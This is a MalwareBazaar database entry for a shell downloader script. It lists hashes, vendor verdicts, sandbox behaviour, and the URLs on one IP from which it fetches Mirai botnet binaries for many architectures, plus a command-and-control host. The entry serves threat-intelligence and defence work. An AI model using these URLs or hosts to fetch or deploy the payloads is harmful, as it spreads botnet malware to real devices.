MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a
SHA3-384 hash: 791bdd82e0e21ee9a326b81689f5cc5e8409cb562f1114312024c56d3118434c10bbc19c5dc5b2db268a9dee0440019c
SHA1 hash: d1e4940d5c4c2f3054498a49a22e613d15eb0356
MD5 hash: 6ec73c36203fbaec8cc4f2bc98108122
humanhash: magazine-magnesium-hydrogen-idaho
File name:wget.sh
Download: download sample
File size:822 bytes
First seen:2025-11-21 22:14:46 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 12:S4yXhJ4y2YN4y3NIl5e4yc0LKu4ym+OFS4yjjMa4y9Ttj54yCSOZY4yLtr4yEa4c:rYVNI7iKv+Isj1T5Ul0tYiPn
TLSH T167011EDE663562629584CF34706644A89178FBD0B27C8B2AFDC51CB3C4D9B01322EF6D
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://31.97.147.189/systemcl/armbe58a44667b375703a76ad0c6ddca15d16aee9717d125919f20dce30763cc00e Mirai32-bit elf mirai Mozi
http://31.97.147.189/systemcl/arm558979f8f088f4a7ccb290972f63908b9f2aed2745965edec68713c3cd48288dd Miraiarm elf geofenced mirai ua-wget USA
http://31.97.147.189/systemcl/arm6cda60790407bccd1f7e11f6b1ec2f299a5348392a1abfdfddaeae28e42bd284f Miraiarm elf geofenced mirai ua-wget USA
http://31.97.147.189/systemcl/arm77dd8c3fe8594bd26a06d0df7438b4c06356b02767c5f246bcca9380549452261 Miraiarm elf geofenced mirai ua-wget USA
http://31.97.147.189/systemcl/m68kee69d2f047fb8bd98d96d1ff4fb41f5dbea8aa91d81b60819542c8de7eb80a62 Miraielf geofenced m68k mirai ua-wget USA
http://31.97.147.189/systemcl/mipsb38cac7dcd0b2f68f15499113658d15987de22ba225cea00a14e95a885adec75 Mirai32-bit elf mirai Mozi
http://31.97.147.189/systemcl/mpsl6bcd18e09bdddc9823c1ebc6090640ed723eddb8d214958ee99d607da2e6d86b Miraielf geofenced mips mirai ua-wget USA
http://31.97.147.189/systemcl/ppc55bdaa3a8a9608985b07865783259092d37736f52066f94df42f2a4c9820b026 Miraielf geofenced mirai PowerPC ua-wget USA
http://31.97.147.189/systemcl/sh46d1e8f244ece4575dd4fa0e405b758ba2bf4b265cdf25eda7084d2d7bd3d1a83 Miraielf mirai ua-wget
http://31.97.147.189/systemcl/spcab43916d8e693e404bcb5f0c732139dfae5b3e122a4ad12b6b97d35639cb7749 Miraielf mirai ua-wget
http://31.97.147.189/systemcl/x865b1f2a4aae9074691cb6f36abffe7c155844f670b8fcf1c9106ca60201217bf3 Mirai32-bit elf mirai Mozi
http://31.97.147.189/systemcl/x86_64970d48b9edbe3f7877701b695eec9e47f7f64409a951de973b4e40e72e0da785 Miraielf geofenced mirai ua-wget USA x86

Intelligence

File Origin
# of uploads :
1
# of downloads :
34
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.32160.LX.BOT.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive mirai
Link:
https://www.filescan.io/uploads/6920e480eecb08e4aa441efc/reports/0acccab0-e3df-4406-94ee-b310f8ad0be1/overview
Verdict:
Malicious
File Type:
text
First seen:
2025-11-21T08:34:00Z UTC
Last seen:
2025-11-21T21:46:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/37cd3114-886e-4ba6-8096-7db795801f36
Behavior Graph:
Download SVG
%3 guuid=fe0bdae5-1900-0000-45e2-ecc5170c0000 pid=3095 /usr/bin/sudo guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102 /tmp/sample.bin guuid=fe0bdae5-1900-0000-45e2-ecc5170c0000 pid=3095->guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102 execve guuid=67449fe8-1900-0000-45e2-ecc5200c0000 pid=3104 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=67449fe8-1900-0000-45e2-ecc5200c0000 pid=3104 execve guuid=91d1c8fa-1900-0000-45e2-ecc54a0c0000 pid=3146 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=91d1c8fa-1900-0000-45e2-ecc54a0c0000 pid=3146 execve guuid=090f2efb-1900-0000-45e2-ecc54c0c0000 pid=3148 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=090f2efb-1900-0000-45e2-ecc54c0c0000 pid=3148 clone guuid=585bfafb-1900-0000-45e2-ecc5500c0000 pid=3152 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=585bfafb-1900-0000-45e2-ecc5500c0000 pid=3152 execve guuid=574c260d-1a00-0000-45e2-ecc56d0c0000 pid=3181 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=574c260d-1a00-0000-45e2-ecc56d0c0000 pid=3181 execve guuid=a36ce70d-1a00-0000-45e2-ecc56e0c0000 pid=3182 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=a36ce70d-1a00-0000-45e2-ecc56e0c0000 pid=3182 clone guuid=1788590f-1a00-0000-45e2-ecc5700c0000 pid=3184 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=1788590f-1a00-0000-45e2-ecc5700c0000 pid=3184 execve guuid=93600726-1a00-0000-45e2-ecc57e0c0000 pid=3198 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=93600726-1a00-0000-45e2-ecc57e0c0000 pid=3198 execve guuid=cd5f6126-1a00-0000-45e2-ecc5800c0000 pid=3200 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=cd5f6126-1a00-0000-45e2-ecc5800c0000 pid=3200 clone guuid=ccb3fd26-1a00-0000-45e2-ecc5830c0000 pid=3203 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=ccb3fd26-1a00-0000-45e2-ecc5830c0000 pid=3203 execve guuid=5fe1f53e-1a00-0000-45e2-ecc5990c0000 pid=3225 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=5fe1f53e-1a00-0000-45e2-ecc5990c0000 pid=3225 execve guuid=87c8d63f-1a00-0000-45e2-ecc59a0c0000 pid=3226 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=87c8d63f-1a00-0000-45e2-ecc59a0c0000 pid=3226 clone guuid=5ec62c41-1a00-0000-45e2-ecc59c0c0000 pid=3228 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=5ec62c41-1a00-0000-45e2-ecc59c0c0000 pid=3228 execve guuid=afb9565b-1a00-0000-45e2-ecc5b20c0000 pid=3250 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=afb9565b-1a00-0000-45e2-ecc5b20c0000 pid=3250 execve guuid=ecbfc35b-1a00-0000-45e2-ecc5b30c0000 pid=3251 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=ecbfc35b-1a00-0000-45e2-ecc5b30c0000 pid=3251 clone guuid=187d9c5c-1a00-0000-45e2-ecc5b60c0000 pid=3254 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=187d9c5c-1a00-0000-45e2-ecc5b60c0000 pid=3254 execve guuid=8c0ba272-1a00-0000-45e2-ecc5cb0c0000 pid=3275 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=8c0ba272-1a00-0000-45e2-ecc5cb0c0000 pid=3275 execve guuid=c8210873-1a00-0000-45e2-ecc5cc0c0000 pid=3276 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=c8210873-1a00-0000-45e2-ecc5cc0c0000 pid=3276 clone guuid=b80dc373-1a00-0000-45e2-ecc5ce0c0000 pid=3278 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=b80dc373-1a00-0000-45e2-ecc5ce0c0000 pid=3278 execve guuid=533d3a89-1a00-0000-45e2-ecc5000d0000 pid=3328 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=533d3a89-1a00-0000-45e2-ecc5000d0000 pid=3328 execve guuid=16587789-1a00-0000-45e2-ecc5020d0000 pid=3330 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=16587789-1a00-0000-45e2-ecc5020d0000 pid=3330 clone guuid=f93ba88a-1a00-0000-45e2-ecc5070d0000 pid=3335 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=f93ba88a-1a00-0000-45e2-ecc5070d0000 pid=3335 execve guuid=f1874c9a-1a00-0000-45e2-ecc51b0d0000 pid=3355 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=f1874c9a-1a00-0000-45e2-ecc51b0d0000 pid=3355 execve guuid=4de1919a-1a00-0000-45e2-ecc51c0d0000 pid=3356 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=4de1919a-1a00-0000-45e2-ecc51c0d0000 pid=3356 clone guuid=bb464c9b-1a00-0000-45e2-ecc51e0d0000 pid=3358 /usr/bin/wget net send-data guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=bb464c9b-1a00-0000-45e2-ecc51e0d0000 pid=3358 execve guuid=c799b2a6-1a00-0000-45e2-ecc5370d0000 pid=3383 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=c799b2a6-1a00-0000-45e2-ecc5370d0000 pid=3383 execve guuid=1f8ef3a6-1a00-0000-45e2-ecc5390d0000 pid=3385 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=1f8ef3a6-1a00-0000-45e2-ecc5390d0000 pid=3385 clone guuid=d061fea6-1a00-0000-45e2-ecc53a0d0000 pid=3386 /usr/bin/wget net send-data guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=d061fea6-1a00-0000-45e2-ecc53a0d0000 pid=3386 execve guuid=bda666b2-1a00-0000-45e2-ecc5550d0000 pid=3413 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=bda666b2-1a00-0000-45e2-ecc5550d0000 pid=3413 execve guuid=c79ed2b2-1a00-0000-45e2-ecc5570d0000 pid=3415 /usr/bin/dash guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=c79ed2b2-1a00-0000-45e2-ecc5570d0000 pid=3415 clone guuid=d4e4e1b2-1a00-0000-45e2-ecc5580d0000 pid=3416 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=d4e4e1b2-1a00-0000-45e2-ecc5580d0000 pid=3416 execve guuid=3a51c5c3-1a00-0000-45e2-ecc5880d0000 pid=3464 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=3a51c5c3-1a00-0000-45e2-ecc5880d0000 pid=3464 execve guuid=4b9705c4-1a00-0000-45e2-ecc5890d0000 pid=3465 /home/sandbox/x86 net guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=4b9705c4-1a00-0000-45e2-ecc5890d0000 pid=3465 execve guuid=feae10de-1a00-0000-45e2-ecc5d40d0000 pid=3540 /usr/bin/wget net send-data write-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=feae10de-1a00-0000-45e2-ecc5d40d0000 pid=3540 execve guuid=9fd976ed-1a00-0000-45e2-ecc5ea0d0000 pid=3562 /usr/bin/chmod guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=9fd976ed-1a00-0000-45e2-ecc5ea0d0000 pid=3562 execve guuid=8e69beed-1a00-0000-45e2-ecc5ec0d0000 pid=3564 /home/sandbox/x86_64 net guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=8e69beed-1a00-0000-45e2-ecc5ec0d0000 pid=3564 execve guuid=d88a0c09-1b00-0000-45e2-ecc5260e0000 pid=3622 /usr/bin/rm delete-file guuid=765064e8-1900-0000-45e2-ecc51e0c0000 pid=3102->guuid=d88a0c09-1b00-0000-45e2-ecc5260e0000 pid=3622 execve f1c78202-5927-5cc6-bd07-437634c15960 31.97.147.189:80 guuid=67449fe8-1900-0000-45e2-ecc5200c0000 pid=3104->f1c78202-5927-5cc6-bd07-437634c15960 send: 140B guuid=585bfafb-1900-0000-45e2-ecc5500c0000 pid=3152->f1c78202-5927-5cc6-bd07-437634c15960 send: 141B guuid=1788590f-1a00-0000-45e2-ecc5700c0000 pid=3184->f1c78202-5927-5cc6-bd07-437634c15960 send: 141B guuid=ccb3fd26-1a00-0000-45e2-ecc5830c0000 pid=3203->f1c78202-5927-5cc6-bd07-437634c15960 send: 141B guuid=5ec62c41-1a00-0000-45e2-ecc59c0c0000 pid=3228->f1c78202-5927-5cc6-bd07-437634c15960 send: 141B guuid=187d9c5c-1a00-0000-45e2-ecc5b60c0000 pid=3254->f1c78202-5927-5cc6-bd07-437634c15960 send: 141B guuid=b80dc373-1a00-0000-45e2-ecc5ce0c0000 pid=3278->f1c78202-5927-5cc6-bd07-437634c15960 send: 141B guuid=f93ba88a-1a00-0000-45e2-ecc5070d0000 pid=3335->f1c78202-5927-5cc6-bd07-437634c15960 send: 140B guuid=bb464c9b-1a00-0000-45e2-ecc51e0d0000 pid=3358->f1c78202-5927-5cc6-bd07-437634c15960 send: 140B guuid=d061fea6-1a00-0000-45e2-ecc53a0d0000 pid=3386->f1c78202-5927-5cc6-bd07-437634c15960 send: 140B guuid=d4e4e1b2-1a00-0000-45e2-ecc5580d0000 pid=3416->f1c78202-5927-5cc6-bd07-437634c15960 send: 140B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=4b9705c4-1a00-0000-45e2-ecc5890d0000 pid=3465->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=f54501de-1a00-0000-45e2-ecc5d20d0000 pid=3538 /home/sandbox/x86 guuid=4b9705c4-1a00-0000-45e2-ecc5890d0000 pid=3465->guuid=f54501de-1a00-0000-45e2-ecc5d20d0000 pid=3538 clone guuid=d7ea04de-1a00-0000-45e2-ecc5d30d0000 pid=3539 /home/sandbox/x86 dns net send-data zombie guuid=4b9705c4-1a00-0000-45e2-ecc5890d0000 pid=3465->guuid=d7ea04de-1a00-0000-45e2-ecc5d30d0000 pid=3539 clone guuid=d7ea04de-1a00-0000-45e2-ecc5d30d0000 pid=3539->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 42B 92baddd7-8a81-534e-9407-4c1f931774f6 ahahahahahajs.unproxy.st:9772 guuid=d7ea04de-1a00-0000-45e2-ecc5d30d0000 pid=3539->92baddd7-8a81-534e-9407-4c1f931774f6 send: 41B guuid=feae10de-1a00-0000-45e2-ecc5d40d0000 pid=3540->f1c78202-5927-5cc6-bd07-437634c15960 send: 143B guuid=8e69beed-1a00-0000-45e2-ecc5ec0d0000 pid=3564->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=137a0109-1b00-0000-45e2-ecc5240e0000 pid=3620 /home/sandbox/x86_64 zombie guuid=8e69beed-1a00-0000-45e2-ecc5ec0d0000 pid=3564->guuid=137a0109-1b00-0000-45e2-ecc5240e0000 pid=3620 clone guuid=245b0609-1b00-0000-45e2-ecc5250e0000 pid=3621 /home/sandbox/x86_64 dns net send-data zombie guuid=8e69beed-1a00-0000-45e2-ecc5ec0d0000 pid=3564->guuid=245b0609-1b00-0000-45e2-ecc5250e0000 pid=3621 clone guuid=245b0609-1b00-0000-45e2-ecc5250e0000 pid=3621->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 42B guuid=245b0609-1b00-0000-45e2-ecc5250e0000 pid=3621->92baddd7-8a81-534e-9407-4c1f931774f6 send: 46B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a/
Threat name:
Linux.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2025-11-21 13:29:22 UTC
File Type:
Text (Shell)
AV detection:
19 of 38 (50.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ufdmo2kbbgloqj6a57ajr2d5iuo4pjatibxptwtvg3ivpcvjrufa._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251121-16esrawlhv/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh a146c769410996e827c0efc098e87d451dc7a413406ef9da7536d1578aa98d0a

(this sample)

Mirai

elf 1a16ce155a3f026fcf3158a138278f0ab7be1440a8db7e72251df784238f12f5

Mirai

elf 3e98eef752fb14582bfd0f70e00ae5f1b2e7ccb06b32597053c6ad8f0e591dae

  
URLhaus
https://urlhaus.abuse.ch/url/3713670/
  
Delivery method
Distributed via web download
  
Dropping
MD5 e3dd5b13a3edce553468bc4464e080c6
  
Dropping
SHA256 3e98eef752fb14582bfd0f70e00ae5f1b2e7ccb06b32597053c6ad8f0e591dae

Comments